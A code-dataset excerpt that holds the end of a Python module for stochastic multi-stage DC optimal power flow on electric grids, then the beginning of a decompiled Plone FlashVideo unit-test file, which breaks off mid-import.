np.hstack((mu0,np.zeros(g.size-x0.size)))\n QPproblem.pi = np.hstack((pi0,np.zeros(g.size-x0.size)))\n \n # Set up solver\n solver = OptSolverIQP()\n solver.set_parameters({'quiet': quiet, \n 'tol': tol})\n \n # Solve\n solver.solve(QPproblem)\n\n # Results\n results = solver.get_results()\n\n # Stage optimal point\n x = solver.get_primal_variables()\n \n # Optimal duals\n lam,nu,mu,pi = solver.get_dual_variables()\n\n # Solutions\n xt = x[:self.num_x]\n y_offset = self.num_p+self.num_q+self.num_w+self.num_s\n Q = np.dot(QPproblem.g,x)+0.5*np.dot(x,QPproblem.H*x)\n gQ = np.hstack(((-mu+pi)[y_offset:y_offset+self.num_y],\n self.oq,self.ow,self.os,self.oy,self.oz))\n\n # Return\n return xt,Q,gQ,results\n\n def solve_stages(self,t,w_list,x_prev,g_corr=[],init_data=None,tf=None,quiet=False,tol=1e-4,next_stage=False):\n \"\"\"\n Solves stages using given realizations of uncertainty \n and cost-to-go slope corrections.\n \n Parameters\n ----------\n t : int (start stage)\n w_list : list of random vectors for stage t,...,T\n x_prev : vector of previous stage variables\n g_corr : list of slope corrections for stage t,...,T\n tf : int (end stage)\n init_data :\n quiet : {True,False}\n tol : \n next_stage : \n \n Returns\n -------\n x : stage solution\n Q : total cost\n gQ : subgradient with respect to x_prev\n \"\"\"\n\n if tf is None:\n tf = self.T-1\n\n if len(g_corr) == 0:\n g_corr = (tf-t+1)*[np.zeros(self.num_x)]\n \n assert(t >= 0)\n assert(t < self.T)\n assert(tf >= 0)\n assert(tf < self.T)\n assert(t <= tf)\n assert(len(w_list) == tf-t+1)\n assert(len(g_corr) == tf-t+1)\n assert(x_prev.shape == (self.num_x,))\n \n p_prev = x_prev[:self.num_p]\n\n # Base\n if tf == self.T-1:\n QPproblem = self.base_problem[t]\n else:\n QPproblem = self.construct_base_problem(t,tf=tf)\n \n # Updates\n p_offset = 0\n s_offset = self.num_p+self.num_q+self.num_w\n QPproblem.b[self.num_bus:self.num_bus+self.num_y] = p_prev\n for i in range(tf-t+1):\n 
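# patch only the pieces of the cached base QP that change between calls:\n            # the stage's linear cost picks up the cost-to-go slope correction g_corr[i],\n            # and the renewable upper bound is set to the sampled availability w_list[i]\n            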
QPproblem.g[p_offset:p_offset+self.num_p] = self.gp+g_corr[i][:self.num_p]\n QPproblem.u[s_offset:s_offset+self.num_s] = w_list[i]\n p_offset += self.num_x\n s_offset += self.num_x\n\n # Warm start\n if init_data is not None:\n QPproblem.x = init_data['x']\n QPproblem.lam = init_data['lam']\n QPproblem.mu = init_data['mu']\n QPproblem.pi = init_data['pi']\n \n if not quiet:\n QPproblem.show()\n\n # Set up solver\n solver = OptSolverIQP()\n solver.set_parameters({'quiet': quiet, \n 'tol': tol})\n \n # Solve\n solver.solve(QPproblem)\n\n # Results\n results = solver.get_results()\n\n # Stage optimal point\n x = solver.get_primal_variables()\n \n # Optimal duals\n lam,nu,mu,pi = solver.get_dual_variables()\n\n # Solutions\n xt = x[:self.num_x]\n y_offset = self.num_p+self.num_q+self.num_w+self.num_s\n Q = np.dot(QPproblem.g,x)+0.5*np.dot(x,QPproblem.H*x)\n gQ = np.hstack(((-mu+pi)[y_offset:y_offset+self.num_y],\n self.oq,self.ow,self.os,self.oy,self.oz))\n\n # Others\n results['xn'] = x[self.num_x:].copy()\n results['gQn'] = None\n results['lamn'] = None\n results['mun'] = None\n results['pin'] = None\n results['Qn'] = None\n\n # Next stage sens\n if t < self.T-1 and next_stage:\n Pn = eye(x.size-self.num_x,x.size,self.num_x,format='csr')\n xn = Pn*x\n un = Pn*QPproblem.u\n ln = Pn*QPproblem.l\n An = QPproblem.An\n bn = QPproblem.bn\n bn[self.num_bus:self.num_bus+self.num_y] = x[:self.num_p]\n gn = Pn*QPproblem.g\n Hn = Pn*QPproblem.H*Pn.T\n lamn = lam[self.num_bus+self.num_p+self.num_z:]\n solver.solve(QuadProblem(Hn,gn,An,bn,ln,un,x=xn,lam=lamn,mu=Pn*mu,pi=Pn*pi))\n xn = solver.get_primal_variables()\n lamn,nun,mun,pin = solver.get_dual_variables() \n results['gQn'] = np.hstack(((-mun+pin)[y_offset:y_offset+self.num_y],\n self.oq,self.ow,self.os,self.oy,self.oz))\n results['lamn'] = lamn\n results['mun'] = mun\n results['pin'] = pin\n results['Qn'] = np.dot(gn,xn)+0.5*np.dot(xn,Hn*xn)\n \n # Return\n return xt,Q,gQ,results\n\n def solve_stage_adjustments(self,t,r,p,quiet=False,tol=1e-4):\n \"\"\"\n Evaluates stage fast-gen adjustments cost.\n \n Parameters\n ----------\n t : int (stage)\n r : vector of current renewable powers\n p : vector of current slow-gen powers\n quiet : {True,False}\n\n Returns\n -------\n q : stage t vars (q,w,s,z)\n Q : stage t cost\n \"\"\"\n\n # Check\n assert(0 <= t < self.T)\n assert(r.shape == (self.num_r,))\n assert(p.shape == (self.num_p,))\n \n # Objective\n H = bmat([[self.Hq,None,None,None], # q\n [None,self.Ow,None,None], # w\n [None,None,self.Os,None], # s\n [None,None,None,self.Oz]], # z\n format='coo')\n\n g = np.hstack((self.gq, # q\n self.ow, # w\n self.os, # s\n self.oz)) # z\n\n # Linear constraints\n A = bmat([[self.C,-self.A,self.R,None],\n [None,self.J,None,-self.Iz]],format='coo')\n \n b = np.hstack((self.b+self.D*self.d_forecast[t]-self.G*p,self.oz))\n \n # Bounds\n u = np.hstack((self.q_max,self.w_max,r,self.z_max))\n l = np.hstack((self.q_min,self.w_min,self.os,self.z_min))\n\n # Problem\n QPproblem = QuadProblem(H,g,A,b,l,u)\n if not quiet:\n QPproblem.show()\n\n # Set up solver\n solver = OptSolverIQP()\n solver.set_parameters({'quiet': quiet, \n 'tol': tol})\n \n # Solve\n solver.solve(QPproblem)\n\n # Stage optimal point\n xadj = solver.get_primal_variables()\n q = xadj[:self.num_q]\n w = xadj[self.num_q:self.num_q+self.num_w]\n s = xadj[self.num_q+self.num_w:self.num_q+self.num_w+self.num_s]\n z = xadj[self.num_q+self.num_w+self.num_s:]\n \n # Return\n return q,w,s,z\n\n def is_point_feasible(self,t,x,x_prev,w):\n \"\"\"\n Checks wether 
point is feasible for the given stage.\n\n        Parameters\n        ----------\n        t : int (stage)\n        x : stage-variable vector\n        x_prev : vector of previous stage variables\n        w : realization of renewable powers\n\n        Returns\n        -------\n        flag : {True,False}\n        \"\"\"\n\n        r = w\n        p,q,w,s,y,z = self.separate_x(x)\n        p_prev,q_prev,w_prev,s_prev,y_prev,z_prev = self.separate_x(x_prev)\n\n        try:\n            eps = 1e-4\n            assert 0 <= t < self.T, 'time'\n            assert np.all(self.y_min <= y), 'ramp min'\n            assert np.all(self.y_max >= y), 'ramp_max'\n            assert np.all(self.z_min <= z), 'thermal_min'\n            assert np.all(self.z_max >= z), 'thermal_max'\n            assert np.all(self.q_min <= q), 'fast_min'\n            assert np.all(self.q_max >= q), 'fast_max'\n            assert np.all(self.p_min <= p), 'slow_min'\n            assert np.all(self.p_max >= p), 'slow_max'\n            assert np.all(self.w_min <= w), 'ang_min'\n            assert np.all(self.w_max >= w), 'ang_max'\n            assert np.all(0 <= s), 'ren_min'\n            assert np.all(r >= s), 'ren_max'\n            assert norm(self.G*p+self.C*q+self.R*s-self.A*w-self.b-self.D*self.d_forecast[t])/norm(self.A.data) < eps, 'power flow'\n            assert norm(self.J*w-z)/norm(self.J.data) < eps, 'thermal eq'\n            assert norm(p-p_prev-y)/(norm(p)+norm(p_prev)+norm(y)) < eps, 'ramp eq'\n            return True\n        except AssertionError as e:\n            print(e)\n            return False\n\n    def sample_w(self,t,observations):\n        \"\"\"\n        Samples realization of renewable powers for the given stage\n        given the observations.\n\n        Parameters\n        ----------\n        t : int (stage)\n        observations : list\n\n        Returns\n        -------\n        w : vector\n        \"\"\"\n\n        assert(t >= 0)\n        assert(t < self.T)\n        assert(len(observations) == t)\n\n        r_eps = self.parameters['r_eps']\n        r_ramp_max = self.parameters['r_ramp_max']\n        r_ramp_freq = self.parameters['r_ramp_freq']\n\n        r = self.r_forecast[t]+self.L_sca[t]*self.L_cov*np.random.randn(self.num_r) # perturbed\n        r = np.maximum(np.minimum(r,self.r_max),r_eps) # cap bound\n        if observations and np.random.rand() <= 1.-r_ramp_freq:\n            dr = r_ramp_max*self.r_max\n            rprev = observations[-1]\n            return np.maximum(np.minimum(r,rprev+dr),rprev-dr) # ramp bound with prob 1-eps\n        else:\n            return r\n\n    def sample_W(self,t,t_from=0,observations=[]):\n        \"\"\"\n        Samples realization of renewable powers up\n        to the given stage.\n\n        Parameters\n        ----------\n        t : int (stage)\n        t_from : int\n        observations : list\n\n        Returns\n        -------\n        W : list\n        \"\"\"\n\n        assert(t >= 0)\n        assert(t < self.T)\n        assert(len(observations) == t_from)\n        if t_from > t:\n            return []\n\n        samples = list(observations)\n        for tau in range(t_from,t+1):\n            samples.append(self.sample_w(tau,samples))\n        assert(len(samples) == t+1)\n        return samples[t_from:]\n\n    def predict_w(self,t,observations):\n        \"\"\"\n        Predicts renewable powers for the given stage\n        given the observations.\n\n        Parameters\n        ----------\n        t : int (stage)\n        observations : list\n\n        Returns\n        -------\n        w : vector\n        \"\"\"\n\n        assert(t >= 0)\n        assert(t < self.T)\n        assert(len(observations) == t)\n\n        r_pred = np.zeros(self.num_r)\n        for i in range(self.parameters['num_samples']):\n            r_pred *= float(i)/float(i+1)\n            r_pred += self.sample_w(t,observations)/(i+1.)\n        return r_pred\n\n    def predict_W(self,t,t_from=0,observations=[]):\n        \"\"\"\n        Predicts renewable powers up to the\n        given stage.\n\n        Parameters\n        ----------\n        t : int (stage)\n        t_from : int\n        observations : list\n\n        Returns\n        -------\n        W : list\n        \"\"\"\n\n        assert(t >= 0)\n        assert(t < self.T)\n        assert(len(observations) == t_from)\n        if t_from > t:\n            return []\n\n        r_pred = np.zeros((t-t_from+1,self.num_r))\n        for i in range(self.parameters['num_samples']):\n            r_pred *= float(i)/float(i+1)\n            r_pred += np.array(self.sample_W(t,t_from,observations))/(i+1.)\n        predictions = [r_pred[tau,:] for tau in 
range(t-t_from+1)]\n assert(len(predictions) == t-t_from+1)\n return predictions\n\n def set_parameters(self,params):\n \"\"\"\n Sets problem parameters.\n \n Parameters\n ----------\n params : dic\n \"\"\"\n \n for key,value in list(params.items()):\n if key in self.parameters:\n self.parameters[key] = value\n \n def show(self,scenario_tree=None):\n \"\"\"\n Shows problem information.\n\n Parameters\n ----------\n sceneario_tree : \n \"\"\"\n\n vargen_cap = np.sum(self.r_max)\n vargen_for = [np.sum(r) for r in self.r_forecast]\n vargen_unc = [np.sum(np.sqrt(tril(triu((s**2.)*self.r_cov)).tocoo().data)) for s in self.L_sca]\n load_for = [np.sum(d) for d in self.d_forecast]\n load_max = max(load_for)\n \n print('\\nStochastic Multi-Stage DCOPF')\n print('----------------------------')\n print('num buses : %d' %self.num_bus)\n print('num branches : %d' %self.num_br)\n print('num gens : %d' %self.num_p)\n print('num vargens : %d' %self.num_r)\n print('num loads : %d' %self.num_l)\n print('num stages : %d' %self.T)\n print('vargen cap : %.2f (%% of max load)' %(100.*vargen_cap/load_max))\n print('vargen corr_rad : %d (edges)' %(self.corr_radius))\n print('vargen corr_val : %.2f (unitless)' %(self.corr_value))\n\n if scenario_tree is not None:\n scenario_tree.show()\n\n # Draw\n if self.parameters['draw']:\n \n import matplotlib.pyplot as plt\n from matplotlib import rcParams\n import seaborn\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n rcParams.update({'figure.autolayout': True})\n seaborn.set_style(\"ticks\")\n\n N = 20\n colors = seaborn.color_palette(\"muted\",N)\n \n # Vargen forecast\n plt.subplot(2,2,1)\n plt.plot([100.*r/load_max for r in vargen_for])\n plt.xlabel(r'stage')\n plt.ylabel(r'vargen forecast (\\% of max load)')\n plt.axis([0,self.T-1,0.,100.])\n plt.grid()\n\n # Vargen uncertainty\n plt.subplot(2,2,2)\n plt.plot([100.*u/vargen_cap for u in vargen_unc])\n plt.xlabel(r'stage')\n plt.ylabel(r'vargen uncertainty (\\% of local cap)')\n plt.axis([0,self.T-1,0.,100.])\n plt.grid()\n \n # Vargen profile\n plt.subplot(2,2,3)\n plt.plot([r/max(vargen_for) for r in vargen_for])\n plt.xlabel(r'stage')\n plt.ylabel(r'vargen profile')\n plt.axis([0,self.T-1,0.,1.])\n plt.grid()\n \n # Load profile\n plt.subplot(2,2,4)\n plt.plot([l/max(load_for) for l in load_for])\n plt.xlabel(r'stage')\n plt.ylabel(r'load profile')\n plt.axis([0,self.T-1,0.,1.])\n plt.grid()\n \n # Vargen prediction\n fig = plt.figure(figsize=(6,5))\n plt.hold(True)\n for i in range(N):\n R = [np.sum(w) for w in self.sample_W(self.T-1)]\n plt.plot(range(1,self.T+1),[100.*r/load_max for r in R],color=colors[i])\n R = [np.sum(w) for w in self.predict_W(self.T-1)]\n plt.plot(range(1,self.T+1),[100.*r/load_max for r in R],color='black',linewidth=3.)\n plt.xlabel(r'stage',fontsize=22)\n plt.ylabel(r'power (\\% of max load)',fontsize=22)\n plt.axis([1,self.T,0.,100.])\n plt.tick_params(axis='both',which='major',labelsize=18)\n plt.tick_params(axis='both',which='minor',labelsize=18)\n plt.title(r'%s: Aggregate Renewable Powers' %self.parameters['name'],fontsize=22,y=1.05)\n plt.grid()\n\n # Scenario tree\n if scenario_tree is not None:\n scenario_tree.draw()\n\n # Vargen prediction from scenario tree\n if scenario_tree is not None:\n fig = plt.figure()\n plt.hold(True)\n for i in range(N):\n R = [np.sum(n.get_w()) for n in scenario_tree.sample_branch(self.T-1)]\n plt.plot([100.*r/load_max for r in R],color=colors[i])\n R = [np.sum(w) for w in self.predict_W(self.T-1)]\n plt.plot([100.*r/load_max for r in 
R],color='black',linewidth=3.)\n plt.xlabel(r'stage',fontsize=22)\n plt.ylabel(r'\\% of max load',fontsize=22)\n plt.axis([0,self.T-1,0.,100.])\n plt.tick_params(axis='both',which='major',labelsize=20)\n plt.tick_params(axis='both',which='minor',labelsize=20)\n plt.title(r'Total Renewable Powers (Scenerio Tree)')\n plt.grid()\n\n # Vargen closests branch from scenario tree\n if scenario_tree is not None:\n fig = plt.figure()\n plt.hold(True)\n for i in range(3):\n W = self.sample_W(self.T-1)\n R1 = [np.sum(w) for w in W]\n R2 = [np.sum(n.get_w()) for n in scenario_tree.get_closest_branch(W)]\n plt.plot([100.*r/load_max for r in R1],color=colors[i],linestyle='-')\n plt.plot([100.*r/load_max for r in R2],color=colors[i],linestyle='--')\n plt.xlabel(r'stage',fontsize=22)\n plt.ylabel(r'\\% of max load',fontsize=22)\n plt.axis([0,self.T-1,0.,100.])\n plt.tick_params(axis='both',which='major',labelsize=20)\n plt.tick_params(axis='both',which='minor',labelsize=20)\n plt.title(r'Closest Branch from Scenerio Tree')\n plt.grid()\n plt.show()\n\n def simulate_policies(self,sim_id):\n \"\"\"\n Simulates policies for a given\n realization of uncertainty.\n\n Parameters\n ----------\n policies : list\n R : list\n sim_id : int\n\n Returns\n -------\n a lot\n \"\"\"\n\n t0 = time.time()\n \n policies = self.policies\n R = self.samples[sim_id]\n\n assert(len(R) == self.T)\n\n print('simulation %d,' %sim_id, end=' ')\n\n num = len(policies)\n dtot = np.zeros(self.T)\n rtot = np.zeros(self.T)\n cost = dict([(i,np.zeros(self.T)) for i in range(num)])\n ptot = dict([(i,np.zeros(self.T)) for i in range(num)])\n qtot = dict([(i,np.zeros(self.T)) for i in range(num)])\n stot = dict([(i,np.zeros(self.T)) for i in range(num)])\n x_prev = dict([(i,self.x_prev) for i in range(num)])\n for t in range(self.T):\n r = R[t]\n dtot[t] = np.sum(self.d_forecast[t])\n rtot[t] = np.sum(r)\n for i in range(num):\n x = policies[i].apply(t,x_prev[i],R[:t+1])\n p,q,w,s,y,z = self.separate_x(x)\n for tau in range(t+1):\n cost[i][tau] += (np.dot(self.gp,p)+\n 0.5*np.dot(p,self.Hp*p)+ # slow gen cost\n np.dot(self.gq,q)+\n 0.5*np.dot(q,self.Hq*q)) # fast gen cost\n ptot[i][t] = np.sum(p)\n qtot[i][t] = np.sum(q)\n stot[i][t] = np.sum(s)\n x_prev[i] = x.copy()\n\n print('time %.2f min' %((time.time()-t0)/60.))\n \n return dtot,rtot,cost,ptot,qtot,stot\n\n def evaluate_policies(self,policies,num_sims,seed=1000,num_procs=0,outfile='',ref_pol=''):\n \"\"\"\n Simulates operation policies.\n\n Parameters\n ----------\n policies : list of StochProblemMS_Policy\n num_runs : int\n seed : int\n outfile : string (name of output file)\n ref_pol : string (name of refernece policy)\n \"\"\"\n\n assert(len(policies) > 0)\n\n from multiprocess import Pool,cpu_count,Process\n \n if not num_procs:\n num_procs = cpu_count()\n \n if not outfile:\n outfile = 'evaluation.csv'\n\n csvfile = open(outfile,'wb')\n writer = csv.writer(csvfile)\n\n np.random.seed(seed)\n\n print('Evaluating policies with %d processes' %num_procs)\n \n # Eval\n self.policies = policies\n self.samples = [self.sample_W(self.T-1) for j in range(num_sims)]\n if num_procs > 1:\n pool = Pool(num_procs)\n func = pool.map\n else:\n func = map\n t0 = time.time()\n results = func(lambda i: self.simulate_policies(i), range(num_sims))\n t1 = time.time() \n print('Total time: %.2f min' %((t1-t0)/60.))\n\n # Process\n num_pol = len(policies)\n dtot,rtot,cost,ptot,qtot,stot = list(zip(*results))\n dtot = np.average(np.array(dtot),axis=0)\n rtot = np.average(np.array(rtot),axis=0)\n cost = 
dict([(i,np.average(np.array([cost[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n ptot = dict([(i,np.average(np.array([ptot[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n qtot = dict([(i,np.average(np.array([qtot[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n stot = dict([(i,np.average(np.array([stot[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n \n # Checks\n assert(dtot.shape == (self.T,))\n assert(rtot.shape == (self.T,))\n for i in range(num_pol):\n assert(cost[i].shape == (self.T,))\n assert(ptot[i].shape == (self.T,))\n assert(qtot[i].shape == (self.T,))\n assert(stot[i].shape == (self.T,))\n\n # Ref policy\n try:\n iref = [p.name for p in policies].index(ref_pol)\n except ValueError:\n iref = 0\n \n # Write\n writer.writerow([self.num_bus,num_sims])\n writer.writerow([p.get_name() for p in policies])\n writer.writerow([p.get_construction_time() for p in policies])\n writer.writerow(['d','r']+num_pol*['cost','p','q','s'])\n for t in range(self.T):\n row = [dtot[t],rtot[t]]\n for i in range(num_pol):\n row += [cost[i][t]/cost[iref][t],\n ptot[i][t],\n qtot[i][t],\n stot[i][t]]\n writer.writerow(row)\n csvfile.close()\n","sub_path":"gridopt/stochastic/multi_stage_DCOPF/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":41931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489200185","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Products\\FlashVideo\\tests\\test_FlashVideo.py\n# Compiled at: 2009-03-02 16:14:25\n\"\"\"Unit tests for FlashVideo class\"\"\"\nimport os, sys, types, mimetypes\nif __name__ == '__main__':\n execfile(os.path.join(sys.path[0], 'framework.py'))\nfrom Acquisition import aq_base\nimport transaction\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone import utils\nfrom Products.FlashVideo.content.FlashVideo import FlashVideo\nfrom Products.FlashVideo.config import *\nfrom Products.FlashVideo.FLVHeader import FLVHeaderError\nfrom Products.FlashVideo.tests.utils import getRequest\nfrom Products.FlashVideo.tests.BaseTest import PloneFunctionalTestCase\nfrom Products.FlashVideo.tests.BaseTest import PloneIntegrationTestCase\nfrom Products.FlashVideo.tests.BaseTest import PloneUnitTestCase\nVIDEO_ID = 'video'\n\nclass FlashVideoUnitTests(PloneUnitTestCase):\n \"\"\"Test class for FlashVideo class. 
Things that need to be \n tested:\n - changing object id (from title not from file)\n - setting attributes (mainly file and image)\n - resolution ofter uploading a file\n - access to 'screenshot' image\n - access to different screenshot scales\n - getting movie width and height (from image resolution) \n \"\"\"\n __module__ = __name__\n portal_type = FLASHVIDEO_PORTALTYPE\n object_id = VIDEO_ID\n\n def test___bobo_traverse__(self):\n \"\"\"Test tricks to have access to image field accessible as\n 'screenshot' URL\n \"\"\"\n video = self.createInstance()\n request = getRequest()\n image = self.getImageFile()\n video.setScreenshot(image)\n obj = video.__bobo_traverse__(request, 'screenshot')\n self.assertNotEqual(obj, None)\n obj = video.__bobo_traverse__(request, 'screenshot_mini')\n self.assertNotEqual(obj, None)\n return\n\n def test_setATCTFileContent(self):\n \"\"\"Test overriden method that should contstruct a valid id\n from title instead of making one from file name\n \"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n empty = video.getFile()\n if type(empty) == types.StringType:\n self.assertEqual(empty, '')\n else:\n self.assertEqual(empty.get_size(), 0)\n video._setATCTFileContent(movie)\n self.assertNotEqual(video.getFile(), '')\n self.assertEqual(video.getId(), self.object_id)\n self.assertNotEqual(video.getId(), movie.filename)\n\n def test_setWidth(self):\n \"\"\"Simple test for setting width\"\"\"\n video = self.createInstance()\n self.assertNotEqual(video.getWidth(), 333)\n video.setWidth(333)\n self.assertEqual(video.getWidth(), 333)\n\n def test_setHeight(self):\n \"\"\"Simple test for setting height\"\"\"\n video = self.createInstance()\n self.assertNotEqual(video.getHeight(), 333)\n video.setHeight(333)\n self.assertEqual(video.getHeight(), 333)\n\n def test_setFile(self):\n \"\"\"Check method that sets file. 
Check if width and height are\n        set correctly\n        \"\"\"\n        video = self.createInstance()\n        movie = self.getMovieFile()\n        empty = video.getFile()\n        if type(empty) == types.StringType:\n            self.assertEqual(empty, '')\n        else:\n            self.assertEqual(empty.get_size(), 0)\n        self.assertEqual(video.getWidth(), '')\n        self.assertEqual(video.getHeight(), '')\n        video.setFile(movie)\n        self.assertEqual(video.getWidth(), 130)\n        self.assertEqual(video.getHeight(), 70)\n        file_ = video.getFile()\n        self.assertNotEqual(file_, '')\n        self.assertNotEqual(file_.get_size(), 0)\n        self.assertNotEqual(file_.getContentType(), FLASHVIDEO_MIMETYPE)\n\n    def test_setFile_bad(self):\n        \"\"\"Check that an error is raised when uploading the wrong kind of file\"\"\"\n        video = self.createInstance()\n        image = self.getImageFile()\n        self.assertRaises(FLVHeaderError, video.setFile, image)\n\n    def test_getMovieWidthHeight1(self):\n        \"\"\"Check if width of video is set according to resolution of screenshot.\"\"\"\n        video = self.createInstance()\n        movie = self.getMovieFile()\n        image = self.getImageFile()\n        self.assertEqual(video.getMovieWidth(), DEFAULT_VIDEO_WIDTH)\n        self.assertEqual(video.getMovieHeight(), DEFAULT_VIDEO_HEIGHT)\n        video.setScreenshot(image)\n        self.assertEqual(video.getMovieWidth(), 130)\n        self.assertEqual(video.getMovieHeight(), 70)\n\n    def test_getMovieWidthHeight2(self):\n        \"\"\"Check if width of video is set according to resolution of movie.\"\"\"\n        video = self.createInstance()\n        movie = self.getMovieFile()\n        image = self.getImageFile()\n        self.assertEqual(video.getMovieWidth(), DEFAULT_VIDEO_WIDTH)\n        self.assertEqual(video.getMovieHeight(), DEFAULT_VIDEO_HEIGHT)\n        video.setFile(movie)\n        self.assertEqual(video.getMovieWidth(), 130)\n        self.assertEqual(video.getMovieHeight(), 70)\n\n    def test_createObject(self):\n        \"\"\"Test creation of simple class instance\"\"\"\n        self.createInstance()\n        ids = self.folder.objectIds()\n        self.assertEqual(self.object_id in ids, True)\n        movie = self.folder._getOb(self.object_id)\n        self.assertEqual(movie.portal_type, FLASHVIDEO_PORTALTYPE)\n        self.assertEqual(movie.getId(), self.object_id)\n\n    def test_getId(self):\n        \"\"\"Check if object id is changed after upload\"\"\"\n        fakefile = self.getMovieFile()\n        id = self.folder.invokeFactory(self.portal_type, id=self.object_id, file=fakefile)\n        self.assertEqual(id, self.object_id)\n        obj = self.folder._getOb(id)\n        self.assertEqual(obj.getId(), self.object_id)\n        self.assertNotEqual(obj.getId(), fakefile.filename)\n\n    def test_hasScreenshot(self):\n        \"\"\"Set up a screenshot and check that it exists\"\"\"\n        video = self.createInstance()\n        movie = self.getMovieFile()\n        image = self.getImageFile()\n        video.setFile(movie)\n        self.assertEqual(video.hasScreenshot(), False)\n        video.setScreenshot(image)\n        self.assertEqual(video.hasScreenshot(), True)\n\n    def test_getConfigString(self):\n        \"\"\"Test that the javascript configuration code changes\n        when a screenshot is defined.\n        \"\"\"\n        video = self.createInstance()\n        movie = self.getMovieFile()\n        image = self.getImageFile()\n        video.setFile(movie)\n        conf = video.getConfigString()\n        self.assertEqual(conf.find(\"/screenshot'\") >= 0, False)\n        video.setScreenshot(image)\n        conf = video.getConfigString()\n        self.assertEqual(conf.find(\"/screenshot'\") >= 0, True)\n\n\nclass FlashVideoIntegrationTestCase(PloneIntegrationTestCase):\n    \"\"\"Functional tests checking that all configuration works\"\"\"\n    __module__ = __name__\n    portal_type = FLASHVIDEO_PORTALTYPE\n    object_id = VIDEO_ID\n    
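# type-info settings and skin-layer files that installation is expected to register\n    type_properties = (('immediate_view', 'flashvideo_view'), 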
('default_view', 'flashvideo_view'), ('content_icon', 'flashvideo_icon.gif'), ('allowed_content_types', ()), ('global_allow', True), ('filter_content_types', False))\n    skin_files = ('FlowPlayerDark.swf', 'flashvideo_icon.gif', 'flashvideo_view', 'swfobject.js')\n\n    def test_installation(self):\n        \"\"\"Test that the installation script works, regardless of\n        whether portal_setup or portal_quickinstaller is used.\n        - check if content_type_registry updated\n        - check if mimetypes_registry updated \n        \"\"\"\n        content_type_registry = getToolByName(self.portal, 'content_type_registry')\n        mimetypes_registry = getToolByName(self.portal, 'mimetypes_registry')\n        predicate_ids = content_type_registry.predicate_ids\n        self.assertEqual('flv' in predicate_ids, True)\n        self.assertEqual('video/x-flv' in predicate_ids, True)\n        self.assertEqual(predicate_ids[(-1)], 'video')\n        mimetypes = mimetypes_registry.lookup('video/x-flv')\n        self.assertEqual(len(mimetypes), 1)\n        self.assertEqual(mimetypes[0].extensions, ['flv'])\n        self.assertEqual(mimetypes[0].icon_path, 'flashvideo_icon.gif')\n\n    def test_mimetypes(self):\n        \"\"\"Check that the new mimetype video/x-flv is added during startup\"\"\"\n        ext = mimetypes.guess_extension(FLASHVIDEO_MIMETYPE)\n        self.assertEqual(ext, '.%s' % FLASHVIDEO_FILE_EXT)\n        (typ, encoding) = mimetypes.guess_type('.%s' % FLASHVIDEO_FILE_EXT)\n        self.assertEqual(typ, FLASHVIDEO_MIMETYPE)\n\n\nclass FlashVideoFunctionalTestCase(PloneFunctionalTestCase):\n    \"\"\"Functional tests for view and edit templates\"\"\"\n    __module__ = __name__\n    portal_type = FLASHVIDEO_PORTALTYPE\n    object_id = VIDEO_ID\n\n    def test_createObjectViaWebDAV(self):\n        \"\"\"Check that upload via WebDAV/FTP works:\n        - file is created\n        - dots and the .flv suffix are removed\n        - title is set\n        \"\"\"\n\n        def new_manage_afterPUT(self, data, marshall_data, file, context, mimetype, filename, REQUEST, RESPONSE):\n            transaction.commit()\n            self.old_manage_afterPUT(data, marshall_data, file, context, mimetype, filename, REQUEST, RESPONSE)\n\n        FlashVideo.old_manage_afterPUT = FlashVideo.manage_afterPUT\n        FlashVideo.manage_afterPUT = new_manage_afterPUT\n        self.failIf('test_movie' in self.folder.objectIds())\n        movie_file = self.getMovieFile()\n        response = self.publish(self.folder_path + '/test_movie.flv', request_method='PUT', stdin=movie_file, basic=self.basic_auth)\n        self.assertEqual(response.getStatus(), 201)\n        self.failUnless('test_movie' in self.folder.objectIds())\n        movie = self.folder.test_movie\n        self.assertEqual(movie.portal_type, FLASHVIDEO_PORTALTYPE)\n        self.assertEqual(movie.Title(), 'Test movie')\n        self.assertEqual(movie.getContentType(), FLASHVIDEO_MIMETYPE)\n\n    def test_createObjectByType(self):\n        \"\"\"Test the patched method that is used, for example, in\n        PloneFlashUpload\n        \"\"\"\n        obj = utils._createObjectByType(FLASHVIDEO_PORTALTYPE, self.folder, VIDEO_ID)\n        self.assertEqual(VIDEO_ID in self.folder.objectIds(), True)\n        movie = getattr(self.folder, VIDEO_ID)\n        self.assertEqual(movie.portal_type, FLASHVIDEO_PORTALTYPE)\n\n    def test_fileStorage(self):\n        \"\"\"If FSS is installed, the stored video is an instance of the FSS class;\n        if not, it is stored as OFS.Image\n        \"\"\"\n        portal_quickinstaller = getToolByName(self.portal, 'portal_quickinstaller')\n        movie_file = self.getMovieFile()\n        self.folder.invokeFactory(self.portal_type, id=self.object_id)\n        movie = self.folder._getOb(self.object_id)\n        movie.setFile(movie_file)\n        file_ = movie.getFile()\n        
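# the concrete storage class depends on whether FileSystemStorage is installed\n        if portal_quickinstaller.isProductInstalled('FileSystemStorage'):\n            from Products.FileSystemStorage.FileSystemStorage 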
